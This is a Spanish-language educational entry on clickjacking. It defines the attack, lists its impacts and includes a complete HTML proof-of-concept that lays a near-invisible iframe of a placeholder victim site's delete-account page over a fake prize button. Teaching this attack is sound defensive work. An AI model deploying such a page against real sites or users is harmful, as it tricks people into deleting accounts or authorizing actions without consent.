Clickjacking
MedioClickjacking / UI Redressing
Definición
Clickjacking es un ataque que engaña al usuario para que haga clic en elementos de una página web legítima que está oculta en un iframe transparente. El atacante superpone su propia página sobre la página objetivo, de modo que cuando el usuario cree que está interactuando con la página visible, en realidad está haciendo clic en la página oculta.
Impacto
Activación de funcionalidades no deseadas (like, follow, etc.)Cambio de configuraciones de seguridad de la cuentaAutorización de transacciones sin consentimientoActivación de cámara o micrófono del navegador
Ejemplos
Clickjacking básico con iframe invisible
El usuario ve un botón de 'Reclamar Premio', pero encima hay un iframe invisible de la página víctima. Al hacer clic, realmente está interactuando con el botón de eliminar cuenta en la página real.
<html>
<head><title>¡Gana un premio!</title></head>
<body>
<h1>Haz clic en "Reclamar Premio"</h1>
<button style="position:absolute; top:300px; left:100px; z-index:1;">
Reclamar Premio
</button>
<!-- Iframe invisible con la página real encima del botón -->
<iframe src="https://victima.com/settings/delete-account"
style="position:absolute; top:250px; left:50px; width:500px; height:200px;
opacity:0.0001; z-index:2;">
</iframe>
</body>
</html>